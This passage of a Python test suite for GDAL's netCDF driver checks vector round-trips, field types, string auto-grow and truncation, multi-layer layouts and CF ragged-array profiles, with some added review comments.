    """Check float X/Y/Z variables are mapped to point geometries.

    Bug fix: `content` was only assigned when the CSV opened successfully,
    so a failed VSIFOpenL raised NameError instead of reporting 'fail'; it
    is now initialized up front.
    """
    if gdaltest.netcdf_drv is None:
        return 'skip'

    with gdaltest.error_handler():
        ds = gdal.OpenEx( 'data/test_ogr_xyz_float.nc', gdal.OF_VECTOR )
        gdal.VectorTranslate( '/vsimem/netcdf_49.csv', ds, format = 'CSV', layerCreationOptions = ['LINEFORMAT=LF', 'GEOMETRY=AS_WKT'] )

    content = None  # ensures a clean 'fail' (not NameError) if the open fails
    fp = gdal.VSIFOpenL( '/vsimem/netcdf_49.csv', 'rb' )
    if fp is not None:
        content = gdal.VSIFReadL( 1, 10000, fp ).decode('ascii')
        gdal.VSIFCloseL(fp)
    expected_content = """WKT,int32
"POINT Z (1 2 3)",1
"POINT (1 2)",
,,
"""
    if content != expected_content:
        gdaltest.post_reason('failure')
        print(content)
        return 'fail'

    gdal.Unlink('/vsimem/netcdf_49.csv')
    return 'success'
###############################################################################
# Test creating a vector NetCDF 3 file with WKT geometry field
def netcdf_50():
    """Round-trip poly.shp through a netCDF file using a WKT geometry field."""
    if gdaltest.netcdf_drv is None:
        return 'skip'

    def _first_feature_json(layer):
        # Serialize the first feature with a normalized FID so both sides
        # compare equal.
        layer.ResetReading()
        feat = layer.GetNextFeature()
        feat.SetFID(-1)
        return feat.ExportToJson()

    src_ds = gdal.OpenEx( '../ogr/data/poly.shp', gdal.OF_VECTOR )
    out_ds = gdal.VectorTranslate( 'tmp/netcdf_50.nc', src_ds, format = 'netCDF', layerCreationOptions = [ 'WKT_DEFAULT_WIDTH=1'] )
    src_json = _first_feature_json(src_ds.GetLayer(0))
    out_json = _first_feature_json(out_ds.GetLayer(0))
    if src_json != out_json:
        gdaltest.post_reason('failure')
        print(src_json)
        print(out_json)
        return 'fail'
    out_ds = None

    # Re-open from disk and verify SRS and first feature again.
    out_ds = gdal.OpenEx( 'tmp/netcdf_50.nc', gdal.OF_VECTOR )
    out_lyr = out_ds.GetLayer(0)
    srs = out_lyr.GetSpatialRef().ExportToWkt()
    if srs.find('PROJCS["OSGB 1936') < 0:
        gdaltest.post_reason('failure')
        print(srs)
        return 'fail'
    out_f = out_lyr.GetNextFeature()
    out_f.SetFID(-1)
    out_json = out_f.ExportToJson()
    if src_json != out_json:
        gdaltest.post_reason('failure')
        print(src_json)
        print(out_json)
        return 'fail'
    out_ds = None
    gdal.Unlink('tmp/netcdf_50.nc')
    return 'success'
###############################################################################
# Test creating a vector NetCDF 3 file with X,Y,Z fields
def netcdf_51():
    """Translate the nc3 vector file back to netCDF (exercising string
    auto-grow), validate via CSV/CSVT export, append fields and a feature in
    update mode, then optionally run the CF compliance checker."""
    if gdaltest.netcdf_drv is None:
        return 'skip'

    ds = gdal.OpenEx( 'data/test_ogr_nc3.nc', gdal.OF_VECTOR )
    # Test autogrow of string fields
    gdal.VectorTranslate( 'tmp/netcdf_51.nc', ds, format = 'netCDF', layerCreationOptions = [ 'STRING_DEFAULT_WIDTH=1'] )
    with gdaltest.error_handler():
        ds = gdal.OpenEx( 'tmp/netcdf_51.nc', gdal.OF_VECTOR )
        gdal.VectorTranslate( '/vsimem/netcdf_51.csv', ds, format = 'CSV', layerCreationOptions = ['LINEFORMAT=LF', 'CREATE_CSVT=YES', 'GEOMETRY=AS_WKT'] )
        ds = None

    # NOTE(review): if VSIFOpenL fails, `content` stays unbound and the
    # comparison below raises NameError rather than reporting 'fail'.
    fp = gdal.VSIFOpenL( '/vsimem/netcdf_51.csv', 'rb' )
    if fp is not None:
        content = gdal.VSIFReadL( 1, 10000, fp ).decode('ascii')
        gdal.VSIFCloseL(fp)
    expected_content = """WKT,int32,int32_explicit_fillValue,float64,float64_explicit_fillValue,string1char,string3chars,twodimstringchar,date,datetime_explicit_fillValue,datetime,int64var,int64var_explicit_fillValue,boolean,boolean_explicit_fillValue,float32,float32_explicit_fillValue,int16,int16_explicit_fillValue,x,byte_field
"POINT Z (1 2 3)",1,1,1.23456789012,1.23456789012,x,STR,STR,1970/01/02,2016/02/06 12:34:56.789,2016/02/06 12:34:56.789,1234567890123,1234567890123,1,1,1.2,1.2,123,12,5,-125
"POINT Z (1 2 0)",,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,
"""
    if content != expected_content:
        gdaltest.post_reason('failure')
        print(content)
        return 'fail'

    fp = gdal.VSIFOpenL( '/vsimem/netcdf_51.csvt', 'rb' )
    if fp is not None:
        content = gdal.VSIFReadL( 1, 10000, fp ).decode('ascii')
        gdal.VSIFCloseL(fp)
    expected_content = """WKT,Integer,Integer,Real,Real,String(1),String(3),String,Date,DateTime,DateTime,Integer64,Integer64,Integer(Boolean),Integer(Boolean),Real(Float32),Real(Float32),Integer(Int16),Integer(Int16),Real,Integer
"""
    if content != expected_content:
        gdaltest.post_reason('failure')
        print(content)
        return 'fail'

    # Re-open in update mode: add two fields and append a modified copy of
    # the first feature.
    ds = gdal.OpenEx( 'tmp/netcdf_51.nc', gdal.OF_VECTOR | gdal.OF_UPDATE )
    lyr = ds.GetLayer(0)
    lyr.CreateField( ogr.FieldDefn('extra', ogr.OFTInteger) )
    lyr.CreateField( ogr.FieldDefn('extra_str', ogr.OFTString) )
    f = lyr.GetNextFeature()
    if f is None:
        gdaltest.post_reason('failure')
        return 'fail'
    f['extra'] = 5
    f['extra_str'] = 'foobar'
    if lyr.CreateFeature(f) != 0:
        gdaltest.post_reason('failure')
        return 'fail'
    ds = None

    # The appended feature is the last one (FID == feature count).
    ds = gdal.OpenEx( 'tmp/netcdf_51.nc', gdal.OF_VECTOR )
    lyr = ds.GetLayer(0)
    f = lyr.GetFeature(lyr.GetFeatureCount())
    if f['int32'] != 1 or f['extra'] != 5 or f['extra_str'] != 'foobar':
        gdaltest.post_reason('failure')
        return 'fail'
    f = None
    ds = None

    # Optional CF compliance check (only when a checker is configured).
    import netcdf_cf
    if netcdf_cf.netcdf_cf_setup() == 'success' and \
       gdaltest.netcdf_cf_method is not None:
        result_cf = netcdf_cf.netcdf_cf_check_file( 'tmp/netcdf_51.nc','auto',False )
        if result_cf != 'success':
            gdaltest.post_reason('failure')
            return 'fail'

    gdal.Unlink('tmp/netcdf_51.nc')
    gdal.Unlink('tmp/netcdf_51.csv')
    gdal.Unlink('tmp/netcdf_51.csvt')
    gdal.Unlink('/vsimem/netcdf_51.csv')
    gdal.Unlink('/vsimem/netcdf_51.csvt')
    gdal.Unlink('/vsimem/netcdf_51.prj')
    return 'success'
###############################################################################
# Test creating a vector NetCDF 3 file with X,Y,Z fields with WRITE_GDAL_TAGS=NO
def netcdf_51_no_gdal_tags():
    """Same round-trip as netcdf_51 but with WRITE_GDAL_TAGS=NO: without the
    GDAL tags, types degrade on re-read (e.g. Integer64 -> Real, note the
    'x1' column name)."""
    if gdaltest.netcdf_drv is None:
        return 'skip'

    ds = gdal.OpenEx( 'data/test_ogr_nc3.nc', gdal.OF_VECTOR )
    gdal.VectorTranslate( 'tmp/netcdf_51_no_gdal_tags.nc', ds, format = 'netCDF', datasetCreationOptions = [ 'WRITE_GDAL_TAGS=NO'] )
    with gdaltest.error_handler():
        ds = gdal.OpenEx( 'tmp/netcdf_51_no_gdal_tags.nc', gdal.OF_VECTOR )
        gdal.VectorTranslate( '/vsimem/netcdf_51_no_gdal_tags.csv', ds, format = 'CSV', layerCreationOptions = ['LINEFORMAT=LF', 'CREATE_CSVT=YES', 'GEOMETRY=AS_WKT'] )
        ds = None

    # NOTE(review): if VSIFOpenL fails, `content` stays unbound and the
    # comparison below raises NameError rather than reporting 'fail'.
    fp = gdal.VSIFOpenL( '/vsimem/netcdf_51_no_gdal_tags.csv', 'rb' )
    if fp is not None:
        content = gdal.VSIFReadL( 1, 10000, fp ).decode('ascii')
        gdal.VSIFCloseL(fp)
    expected_content = """WKT,int32,int32_explicit_fillValue,float64,float64_explicit_fillValue,string1char,string3chars,twodimstringchar,date,datetime_explicit_fillValue,datetime,int64var,int64var_explicit_fillValue,boolean,boolean_explicit_fillValue,float32,float32_explicit_fillValue,int16,int16_explicit_fillValue,x1,byte_field
"POINT Z (1 2 3)",1,1,1.23456789012,1.23456789012,x,STR,STR,1970/01/02,2016/02/06 12:34:56.789,2016/02/06 12:34:56.789,1234567890123,1234567890123,1,1,1.2,1.2,123,12,5,-125
"POINT Z (1 2 0)",,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,
"""
    if content != expected_content:
        gdaltest.post_reason('failure')
        print(content)
        return 'fail'

    fp = gdal.VSIFOpenL( '/vsimem/netcdf_51_no_gdal_tags.csvt', 'rb' )
    if fp is not None:
        content = gdal.VSIFReadL( 1, 10000, fp ).decode('ascii')
        gdal.VSIFCloseL(fp)
    expected_content = """WKT,Integer,Integer,Real,Real,String(1),String(3),String(10),Date,DateTime,DateTime,Real,Real,Integer,Integer,Real(Float32),Real(Float32),Integer(Int16),Integer(Int16),Real,Integer
"""
    if content != expected_content:
        gdaltest.post_reason('failure')
        print(content)
        return 'fail'

    gdal.Unlink('tmp/netcdf_51_no_gdal_tags.nc')
    gdal.Unlink('tmp/netcdf_51_no_gdal_tags.csv')
    gdal.Unlink('tmp/netcdf_51_no_gdal_tags.csvt')
    gdal.Unlink('/vsimem/netcdf_51_no_gdal_tags.csv')
    gdal.Unlink('/vsimem/netcdf_51_no_gdal_tags.csvt')
    gdal.Unlink('/vsimem/netcdf_51_no_gdal_tags.prj')
    return 'success'
###############################################################################
# Test creating a vector NetCDF 4 file with X,Y,Z fields
def netcdf_52():
    """Translate the nc4 vector file back to NC4, validate via CSV/CSVT
    export, append a field and a feature in update mode, then optionally run
    the CF compliance checker."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    if not gdaltest.netcdf_drv_has_nc4:
        return 'skip'

    ds = gdal.OpenEx( 'data/test_ogr_nc4.nc', gdal.OF_VECTOR )
    gdal.VectorTranslate( 'tmp/netcdf_52.nc', ds, format = 'netCDF', datasetCreationOptions = ['FORMAT=NC4'] )
    with gdaltest.error_handler():
        ds = gdal.OpenEx( 'tmp/netcdf_52.nc', gdal.OF_VECTOR )
        gdal.VectorTranslate( '/vsimem/netcdf_52.csv', ds, format = 'CSV', layerCreationOptions = ['LINEFORMAT=LF', 'CREATE_CSVT=YES', 'GEOMETRY=AS_WKT'] )
        ds = None

    # NOTE(review): if VSIFOpenL fails, `content` stays unbound and the
    # comparison below raises NameError rather than reporting 'fail'.
    fp = gdal.VSIFOpenL( '/vsimem/netcdf_52.csv', 'rb' )
    if fp is not None:
        content = gdal.VSIFReadL( 1, 10000, fp ).decode('ascii')
        gdal.VSIFCloseL(fp)
    expected_content = """WKT,int32,int32_explicit_fillValue,float64,float64_explicit_fillValue,string3chars,twodimstringchar,date,datetime,datetime_explicit_fillValue,int64,int64var_explicit_fillValue,boolean,boolean_explicit_fillValue,float32,float32_explicit_fillValue,int16,int16_explicit_fillValue,x,byte_field,ubyte_field,ubyte_field_explicit_fillValue,ushort_field,ushort_field_explicit_fillValue,uint_field,uint_field_explicit_fillValue,uint64_field,uint64_field_explicit_fillValue
"POINT Z (1 2 3)",1,1,1.23456789012,1.23456789012,STR,STR,1970/01/02,2016/02/06 12:34:56.789,2016/02/06 12:34:56.789,1234567890123,,1,1,1.2,1.2,123,12,5,-125,254,255,65534,65535,4000000000,4294967295,1234567890123,
"POINT Z (1 2 0)",,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,
"""
    if content != expected_content:
        gdaltest.post_reason('failure')
        print(content)
        return 'fail'

    fp = gdal.VSIFOpenL( '/vsimem/netcdf_52.csvt', 'rb' )
    if fp is not None:
        content = gdal.VSIFReadL( 1, 10000, fp ).decode('ascii')
        gdal.VSIFCloseL(fp)
    expected_content = """WKT,Integer,Integer,Real,Real,String(3),String,Date,DateTime,DateTime,Integer64,Integer64,Integer(Boolean),Integer(Boolean),Real(Float32),Real(Float32),Integer(Int16),Integer(Int16),Real,Integer,Integer,Integer,Integer,Integer,Integer64,Integer64,Real,Real
"""
    if content != expected_content:
        gdaltest.post_reason('failure')
        print(content)
        return 'fail'

    # Re-open in update mode: add a field and append a modified copy of the
    # first feature.
    ds = gdal.OpenEx( 'tmp/netcdf_52.nc', gdal.OF_VECTOR | gdal.OF_UPDATE )
    lyr = ds.GetLayer(0)
    lyr.CreateField( ogr.FieldDefn('extra', ogr.OFTInteger) )
    f = lyr.GetNextFeature()
    if f is None:
        gdaltest.post_reason('failure')
        return 'fail'
    f['extra'] = 5
    if lyr.CreateFeature(f) != 0:
        gdaltest.post_reason('failure')
        return 'fail'
    ds = None

    # The appended feature is the last one (FID == feature count).
    ds = gdal.OpenEx( 'tmp/netcdf_52.nc', gdal.OF_VECTOR )
    lyr = ds.GetLayer(0)
    f = lyr.GetFeature(lyr.GetFeatureCount())
    if f['int32'] != 1 or f['extra'] != 5:
        gdaltest.post_reason('failure')
        return 'fail'
    f = None
    ds = None

    # Optional CF compliance check (only when a checker is configured).
    import netcdf_cf
    if netcdf_cf.netcdf_cf_setup() == 'success' and \
       gdaltest.netcdf_cf_method is not None:
        result_cf = netcdf_cf.netcdf_cf_check_file( 'tmp/netcdf_52.nc','auto',False )
        if result_cf != 'success':
            gdaltest.post_reason('failure')
            return 'fail'

    gdal.Unlink('tmp/netcdf_52.nc')
    gdal.Unlink('tmp/netcdf_52.csv')
    gdal.Unlink('tmp/netcdf_52.csvt')
    gdal.Unlink('/vsimem/netcdf_52.csv')
    gdal.Unlink('/vsimem/netcdf_52.csvt')
    gdal.Unlink('/vsimem/netcdf_52.prj')
    return 'success'
###############################################################################
# Test creating a vector NetCDF 4 file with WKT geometry field
def netcdf_53():
    """Round-trip poly.shp through an NC4 file using a WKT geometry field."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    if not gdaltest.netcdf_drv_has_nc4:
        return 'skip'

    def _first_feature_json(layer):
        # Serialize the first feature with a normalized FID so both sides
        # compare equal.
        layer.ResetReading()
        feat = layer.GetNextFeature()
        feat.SetFID(-1)
        return feat.ExportToJson()

    src_ds = gdal.OpenEx( '../ogr/data/poly.shp', gdal.OF_VECTOR )
    out_ds = gdal.VectorTranslate( 'tmp/netcdf_53.nc', src_ds, format = 'netCDF', datasetCreationOptions = ['FORMAT=NC4'] )
    src_json = _first_feature_json(src_ds.GetLayer(0))
    out_json = _first_feature_json(out_ds.GetLayer(0))
    if src_json != out_json:
        gdaltest.post_reason('failure')
        print(src_json)
        print(out_json)
        return 'fail'
    out_ds = None

    # Re-open from disk and verify SRS and first feature again.
    out_ds = gdal.OpenEx( 'tmp/netcdf_53.nc', gdal.OF_VECTOR )
    out_lyr = out_ds.GetLayer(0)
    srs = out_lyr.GetSpatialRef().ExportToWkt()
    if srs.find('PROJCS["OSGB 1936') < 0:
        gdaltest.post_reason('failure')
        print(srs)
        return 'fail'
    out_f = out_lyr.GetNextFeature()
    out_f.SetFID(-1)
    out_json = out_f.ExportToJson()
    if src_json != out_json:
        gdaltest.post_reason('failure')
        print(src_json)
        print(out_json)
        return 'fail'
    out_ds = None
    gdal.Unlink('tmp/netcdf_53.nc')
    return 'success'
###############################################################################
# Test appending to a vector NetCDF 4 file with unusual types (ubyte, ushort...)
def netcdf_54():
    """Append a modified feature to an NC4 vector file and re-read it."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    if not gdaltest.netcdf_drv_has_nc4:
        return 'skip'

    shutil.copy( 'data/test_ogr_nc4.nc', 'tmp/netcdf_54.nc')
    ds = gdal.OpenEx( 'tmp/netcdf_54.nc', gdal.OF_VECTOR | gdal.OF_UPDATE )
    lyr = ds.GetLayer(0)
    feat = lyr.GetNextFeature()
    if feat is None:
        gdaltest.post_reason('failure')
        return 'fail'
    feat['int32'] += 1
    feat.SetFID(-1)
    feat.ExportToJson()  # result discarded; kept to match the original call sequence
    src_json = feat.ExportToJson()
    if lyr.CreateFeature(feat) != 0:
        gdaltest.post_reason('failure')
        return 'fail'
    ds = None

    # The appended feature is the last one (FID == feature count).
    ds = gdal.OpenEx( 'tmp/netcdf_54.nc', gdal.OF_VECTOR )
    lyr = ds.GetLayer(0)
    feat = lyr.GetFeature(lyr.GetFeatureCount())
    feat.SetFID(-1)
    out_json = feat.ExportToJson()
    feat = None
    ds = None
    gdal.Unlink('tmp/netcdf_54.nc')
    if src_json != out_json:
        gdaltest.post_reason('failure')
        print(src_json)
        print(out_json)
        return 'fail'
    return 'success'
###############################################################################
# Test auto-grow of bidimensional char variables in a vector NetCDF 4 file
def netcdf_55():
    """Write a value longer than the char dimension and check it round-trips."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    if not gdaltest.netcdf_drv_has_nc4:
        return 'skip'

    shutil.copy( 'data/test_ogr_nc4.nc', 'tmp/netcdf_55.nc')
    ds = gdal.OpenEx( 'tmp/netcdf_55.nc', gdal.OF_VECTOR | gdal.OF_UPDATE )
    lyr = ds.GetLayer(0)
    feat = lyr.GetNextFeature()
    if feat is None:
        gdaltest.post_reason('failure')
        return 'fail'
    feat['twodimstringchar'] = 'abcd'
    feat.SetFID(-1)
    feat.ExportToJson()  # result discarded; kept to match the original call sequence
    src_json = feat.ExportToJson()
    if lyr.CreateFeature(feat) != 0:
        gdaltest.post_reason('failure')
        return 'fail'
    ds = None

    # The appended feature is the last one (FID == feature count).
    ds = gdal.OpenEx( 'tmp/netcdf_55.nc', gdal.OF_VECTOR )
    lyr = ds.GetLayer(0)
    feat = lyr.GetFeature(lyr.GetFeatureCount())
    feat.SetFID(-1)
    out_json = feat.ExportToJson()
    feat = None
    ds = None
    gdal.Unlink('tmp/netcdf_55.nc')
    if src_json != out_json:
        gdaltest.post_reason('failure')
        print(src_json)
        print(out_json)
        return 'fail'
    return 'success'
###############################################################################
# Test truncation of bidimensional char variables and WKT in a vector NetCDF 3 file
def netcdf_56():
    """With auto-grow disabled, long strings/WKT must be truncated/dropped."""
    if gdaltest.netcdf_drv is None:
        return 'skip'

    ds = ogr.GetDriverByName('netCDF').CreateDataSource('tmp/netcdf_56.nc')
    # Test auto-grow of WKT field
    lyr = ds.CreateLayer('netcdf_56', options = [ 'AUTOGROW_STRINGS=NO', 'STRING_DEFAULT_WIDTH=5', 'WKT_DEFAULT_WIDTH=5' ] )
    lyr.CreateField(ogr.FieldDefn('txt'))
    feat = ogr.Feature(lyr.GetLayerDefn())
    feat['txt'] = '0123456789'
    feat.SetGeometry(ogr.CreateGeometryFromWkt('POINT (1 2)'))
    with gdaltest.error_handler():
        status = lyr.CreateFeature(feat)
    if status != 0:
        gdaltest.post_reason('failure')
        return 'fail'
    ds = None

    ds = gdal.OpenEx( 'tmp/netcdf_56.nc', gdal.OF_VECTOR )
    lyr = ds.GetLayer(0)
    feat = lyr.GetFeature(lyr.GetFeatureCount())
    # Truncated to width 5; the over-long WKT was dropped entirely.
    if feat['txt'] != '01234' or feat.GetGeometryRef() is not None:
        gdaltest.post_reason('failure')
        feat.DumpReadable()
        return 'fail'
    ds = None
    gdal.Unlink('tmp/netcdf_56.nc')
    return 'success'
###############################################################################
# Test one layer per file creation
def netcdf_57():
    """Create two layers as separate files in a directory datasource."""
    if gdaltest.netcdf_drv is None:
        return 'skip'

    try:
        shutil.rmtree('tmp/netcdf_57')
    except:
        pass

    # Creating under a non-existent directory must fail.
    with gdaltest.error_handler():
        ds = ogr.GetDriverByName('netCDF').CreateDataSource('/not_existing_dir/invalid_subdir', options = ['MULTIPLE_LAYERS=SEPARATE_FILES'])
    if ds is not None:
        gdaltest.post_reason('failure')
        return 'fail'

    # NOTE(review): this second attempt uses the same non-existent path while
    # a plain file 'tmp/netcdf_57' exists — possibly meant to target that
    # file instead; behavior kept as-is.
    open('tmp/netcdf_57', 'wb').close()
    with gdaltest.error_handler():
        ds = ogr.GetDriverByName('netCDF').CreateDataSource('/not_existing_dir/invalid_subdir', options = ['MULTIPLE_LAYERS=SEPARATE_FILES'])
    if ds is not None:
        gdaltest.post_reason('failure')
        return 'fail'
    os.unlink('tmp/netcdf_57')

    # Now create for real: one .nc file per layer inside tmp/netcdf_57/.
    ds = ogr.GetDriverByName('netCDF').CreateDataSource('tmp/netcdf_57', options = ['MULTIPLE_LAYERS=SEPARATE_FILES'])
    for idx in range(2):
        lyr = ds.CreateLayer('lyr%d' % idx)
        lyr.CreateField(ogr.FieldDefn('lyr_id', ogr.OFTInteger))
        feat = ogr.Feature(lyr.GetLayerDefn())
        feat['lyr_id'] = idx
        lyr.CreateFeature(feat)
    ds = None

    for idx in range(2):
        ds = ogr.Open('tmp/netcdf_57/lyr%d.nc' % idx)
        feat = ds.GetLayer(0).GetNextFeature()
        if feat['lyr_id'] != idx:
            gdaltest.post_reason('failure')
            return 'fail'
        ds = None

    shutil.rmtree('tmp/netcdf_57')
    return 'success'
###############################################################################
# Test one layer per group (NC4)
def netcdf_58():
    """Create two layers as separate NC4 groups and read them back."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    if not gdaltest.netcdf_drv_has_nc4:
        return 'skip'

    ds = ogr.GetDriverByName('netCDF').CreateDataSource('tmp/netcdf_58.nc', options = ['FORMAT=NC4', 'MULTIPLE_LAYERS=SEPARATE_GROUPS'])
    for idx in range(2):
        # Make sure auto-grow will happen to test this works well with multiple groups
        lyr = ds.CreateLayer('lyr%d' % idx, geom_type = ogr.wkbNone, options = ['USE_STRING_IN_NC4=NO', 'STRING_DEFAULT_WIDTH=1' ])
        lyr.CreateField(ogr.FieldDefn('lyr_id', ogr.OFTString))
        feat = ogr.Feature(lyr.GetLayerDefn())
        feat['lyr_id'] = 'lyr_%d' % idx
        lyr.CreateFeature(feat)
    ds = None

    ds = ogr.Open('tmp/netcdf_58.nc')
    for idx in range(2):
        feat = ds.GetLayer(idx).GetNextFeature()
        if feat['lyr_id'] != 'lyr_%d' % idx:
            gdaltest.post_reason('failure')
            return 'fail'
    ds = None
    gdal.Unlink('tmp/netcdf_58.nc')
    return 'success'
###############################################################################
#check for UnitType set/get.
def netcdf_59():
    """Check band UnitType is read from file and can be set on copy."""
    if gdaltest.netcdf_drv is None:
        return 'skip'

    # get
    ds = gdal.Open( 'data/unittype.nc' )
    unit = ds.GetRasterBand( 1 ).GetUnitType()
    ds = None
    if unit != 'm/s':
        gdaltest.post_reason( 'Incorrect unit(%s)' % unit )
        return 'fail'

    # set
    tst = gdaltest.GDALTest( 'NetCDF', 'unittype.nc', 1, 4672 )
    return tst.testSetUnitType()
###############################################################################
# Test reading a "Indexed ragged array representation of profiles" v1.6.0 H3.5
# http://cfconventions.org/cf-conventions/v1.6.0/cf-conventions.html#_indexed_ragged_array_representation_of_profiles
def netcdf_60():
    """Read an "Indexed ragged array representation of profiles" (CF-1.6 H3.5).

    http://cfconventions.org/cf-conventions/v1.6.0/cf-conventions.html#_indexed_ragged_array_representation_of_profiles
    Returns 'skip', 'fail' or 'success' per gdaltest convention.
    """
    if gdaltest.netcdf_drv is None:
        return 'skip'
    # The file is vector-only: a raster-only open must fail...
    ds = gdal.OpenEx( 'data/profile.nc', gdal.OF_RASTER )
    if ds is not None:
        gdaltest.post_reason('fail')
        return 'fail'
    # ...while a vector open must succeed.
    ds = gdal.OpenEx( 'data/profile.nc', gdal.OF_VECTOR)
    if ds is None:
        gdaltest.post_reason('fail')
        return 'fail'
    with gdaltest.error_handler():
        gdal.VectorTranslate( '/vsimem/netcdf_60.csv', ds, format = 'CSV', layerCreationOptions = ['LINEFORMAT=LF', 'GEOMETRY=AS_WKT'] )
    # Fix: initialize so a failed VSIFOpenL yields a clean 'fail' instead of
    # an unhandled NameError at the comparison below.
    content = None
    fp = gdal.VSIFOpenL( '/vsimem/netcdf_60.csv', 'rb' )
    if fp is not None:
        content = gdal.VSIFReadL( 1, 10000, fp ).decode('ascii')
        gdal.VSIFCloseL(fp)
    expected_content = """WKT,profile,id,station,foo
"POINT Z (2 49 100)",1,1,Palo Alto,bar
"POINT Z (3 50 50)",2,2,Santa Fe,baz
"POINT Z (2 49 200)",1,3,Palo Alto,baw
"POINT Z (3 50 100)",2,4,Santa Fe,baz2
"""
    if content != expected_content:
        gdaltest.post_reason('failure')
        print(content)
        return 'fail'
    gdal.Unlink('/vsimem/netcdf_60.csv')
    return 'success'
###############################################################################
# Test appending to a "Indexed ragged array representation of profiles" v1.6.0 H3.5
def netcdf_61():
    """Append to an "Indexed ragged array representation of profiles" (CF-1.6 H3.5).

    Copies data/profile.nc to tmp, appends the same features once more and
    checks that a CSV dump shows the four original rows twice.
    """
    if gdaltest.netcdf_drv is None:
        return 'skip'
    shutil.copy('data/profile.nc', 'tmp/netcdf_61.nc')
    ds = gdal.VectorTranslate( 'tmp/netcdf_61.nc', 'data/profile.nc', accessMode = 'append' )
    gdal.VectorTranslate( '/vsimem/netcdf_61.csv', ds, format = 'CSV', layerCreationOptions = ['LINEFORMAT=LF', 'GEOMETRY=AS_WKT'] )
    ds = None  # fix: close the appended dataset before cleanup
    # Fix: initialize so a failed VSIFOpenL yields a clean 'fail', not NameError.
    content = None
    fp = gdal.VSIFOpenL( '/vsimem/netcdf_61.csv', 'rb' )
    if fp is not None:
        content = gdal.VSIFReadL( 1, 10000, fp ).decode('ascii')
        gdal.VSIFCloseL(fp)
    expected_content = """WKT,profile,id,station,foo
"POINT Z (2 49 100)",1,1,Palo Alto,bar
"POINT Z (3 50 50)",2,2,Santa Fe,baz
"POINT Z (2 49 200)",1,3,Palo Alto,baw
"POINT Z (3 50 100)",2,4,Santa Fe,baz2
"POINT Z (2 49 100)",1,1,Palo Alto,bar
"POINT Z (3 50 50)",2,2,Santa Fe,baz
"POINT Z (2 49 200)",1,3,Palo Alto,baw
"POINT Z (3 50 100)",2,4,Santa Fe,baz2
"""
    if content != expected_content:
        gdaltest.post_reason('failure')
        print(content)
        return 'fail'
    gdal.Unlink('/vsimem/netcdf_61.csv')
    # Fix: was gdal.Unlink('/vsimem/netcdf_61.nc'), a path that never existed;
    # the file actually created above lives in tmp/.
    gdal.Unlink('tmp/netcdf_61.nc')
    return 'success'
###############################################################################
# Test creating a "Indexed ragged array representation of profiles" v1.6.0 H3.5
def netcdf_62():
    """Create an "Indexed ragged array representation of profiles" (CF-1.6 H3.5).

    tmp/netcdf_62.nc is intentionally left on disk: netcdf_62_ncdump_check()
    and netcdf_62_cf_check() inspect it afterwards.
    """
    if gdaltest.netcdf_drv is None:
        return 'skip'
    ds = gdal.VectorTranslate( 'tmp/netcdf_62.nc', 'data/profile.nc', format = 'netCDF', layerCreationOptions = ['FEATURE_TYPE=PROFILE', 'PROFILE_DIM_INIT_SIZE=1', 'PROFILE_VARIABLES=station'] )
    gdal.VectorTranslate( '/vsimem/netcdf_62.csv', ds, format = 'CSV', layerCreationOptions = ['LINEFORMAT=LF', 'GEOMETRY=AS_WKT'] )
    # Fix: initialize so a failed VSIFOpenL yields a clean 'fail', not NameError.
    content = None
    fp = gdal.VSIFOpenL( '/vsimem/netcdf_62.csv', 'rb' )
    if fp is not None:
        content = gdal.VSIFReadL( 1, 10000, fp ).decode('ascii')
        gdal.VSIFCloseL(fp)
    expected_content = """WKT,profile,id,station,foo
"POINT Z (2 49 100)",1,1,Palo Alto,bar
"POINT Z (3 50 50)",2,2,Santa Fe,baz
"POINT Z (2 49 200)",1,3,Palo Alto,baw
"POINT Z (3 50 100)",2,4,Santa Fe,baz2
"""
    if content != expected_content:
        gdaltest.post_reason('failure')
        print(content)
        return 'fail'
    gdal.Unlink('/vsimem/netcdf_62.csv')
    return 'success'
def netcdf_62_ncdump_check():
    """Inspect tmp/netcdf_62.nc with ncdump; skip when ncdump is unavailable."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    # Probe for ncdump (if available); any failure to launch it means "absent".
    try:
        (ret, err) = gdaltest.runexternal_out_and_err('ncdump -h')
    except Exception:  # fix: was a bare except, which also swallowed SystemExit
        err = None
    if err is not None and 'netcdf library version' in err:
        (ret, err) = gdaltest.runexternal_out_and_err( 'ncdump -h tmp/netcdf_62.nc' )
        # The header must declare the CF profile discrete-geometry structure
        # and the string variables created by netcdf_62().
        if ret.find('profile = 2') < 0 or \
           ret.find('record = UNLIMITED') < 0 or \
           ret.find('profile:cf_role = "profile_id"') < 0 or \
           ret.find('parentIndex:instance_dimension = "profile"') < 0 or \
           ret.find(':featureType = "profile"') < 0 or \
           ret.find('char station(profile') < 0 or \
           ret.find('char foo(record') < 0:
            gdaltest.post_reason('failure')
            print(ret)
            return 'fail'
    else:
        return 'skip'
    return 'success'
def netcdf_62_cf_check():
    """Run the CF-compliance checker (when configured) on tmp/netcdf_62.nc."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    import netcdf_cf
    checker_ready = netcdf_cf.netcdf_cf_setup() == 'success' and \
                    gdaltest.netcdf_cf_method is not None
    if checker_ready:
        if netcdf_cf.netcdf_cf_check_file( 'tmp/netcdf_62.nc','auto',False ) != 'success':
            gdaltest.post_reason('failure')
            return 'fail'
    gdal.Unlink('/vsimem/netcdf_62.nc')
    return 'success'
###############################################################################
# Test creating a NC4 "Indexed ragged array representation of profiles" v1.6.0 H3.5
def netcdf_63():
    """Create an NC4 "Indexed ragged array representation of profiles" (CF-1.6 H3.5).

    tmp/netcdf_63.nc is left on disk for netcdf_63_ncdump_check().
    """
    if gdaltest.netcdf_drv is None:
        return 'skip'
    if not gdaltest.netcdf_drv_has_nc4:
        return 'skip'
    shutil.copy('data/profile.nc', 'tmp/netcdf_63.nc')
